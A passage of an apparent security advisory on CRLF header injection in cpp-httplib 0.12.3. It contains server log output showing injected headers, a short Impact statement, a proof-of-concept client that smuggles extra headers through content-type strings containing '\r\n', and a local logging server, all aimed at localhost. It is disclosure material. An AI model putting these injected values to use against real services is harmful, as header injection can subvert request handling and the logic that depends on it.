LOCAL\_PORT: 8080
REMOTE\_ADDR: 127.0.0.1
REMOTE\_PORT: 50982
User-Agent: cpp-httplib/0.12.3
================================
PUT HTTP/1.1 /test3
Accept: \*/\*
Connection: close
Content-Length: 4
Content-Type: text/plain
evil3: hello3
Host: 0.0.0.0:8080
LOCAL\_ADDR: 127.0.0.1
LOCAL\_PORT: 8080
REMOTE\_ADDR: 127.0.0.1
REMOTE\_PORT: 50984
User-Agent: cpp-httplib/0.12.3
================================
PATCH HTTP/1.1 /test4
Accept: \*/\*
Connection: close
Content-Length: 7
Content-Type: text/plain
evil4: hello4
Host: 0.0.0.0:8080
LOCAL\_ADDR: 127.0.0.1
LOCAL\_PORT: 8080
REMOTE\_ADDR: 127.0.0.1
REMOTE\_PORT: 50988
User-Agent: cpp-httplib/0.12.3

**Impact**

If untrusted user input is placed in header values, a malicious user could inject additional headers. It can lead to logical errors and other misbehaviours.

**Author**

Alessio Della Libera

#include "./httplib.h"

int main(void)

{

httplib::Client cli("0.0.0.0", 8080);

cli.Post("/test1", "A=B", "application/x-www-form-urlencoded\\r\\nevil1: hello1");

cli.Delete("/test2", "A=B", "text/plain\\r\\nevil2: hello2");

cli.Put("/test3", "text", "text/plain\\r\\nevil3: hello3");

cli.Patch("/test4", "content", "text/plain\\r\\nevil4: hello4");

}

#include "./httplib.h"

#include <iostream\>

#include <stdlib.h\>

using namespace std;

using namespace httplib;

string dump\_headers(const Headers &headers) {

string s;

char buf\[BUFSIZ\];

for (const auto &x : headers) {

snprintf(buf, sizeof(buf), "%s: %s\\n", x.first.c\_str(), x.second.c\_str());

s += buf;

}

return s;

}

string log(const Request &req, const Response &res) {

string s;

char buf\[BUFSIZ\];

s += "\================================\\n";

snprintf(buf, sizeof(buf), "%s %s %s\\n", req.method.c\_str(), req.version.c\_str(), req.path.c\_str());

s += buf;

s += dump\_headers(req.headers);

return s;

}

int main(void)

{

Server svr;

svr.Post("/test1", \[\](const Request &req, Response &res) {

res.set\_content("Hello 1", "text/plain");

});

svr.Delete("/test2", \[\](const Request &req, Response &res) {

res.set\_content("Hello 2", "text/plain");

});

svr.Put("/test3", \[\](const Request &req, Response &res) {

res.set\_content("Hello 3", "text/plain");

});

svr.Patch("/test4", \[\](const Request &req, Response &res) {

res.set\_content("Hello 4", "text/plain");

});

svr.set\_logger(\[\](const Request &req, const Response &res) {

cout << log(req, res);

});

svr.listen("localhost", 8080);

return 0;

}

Tag

#ios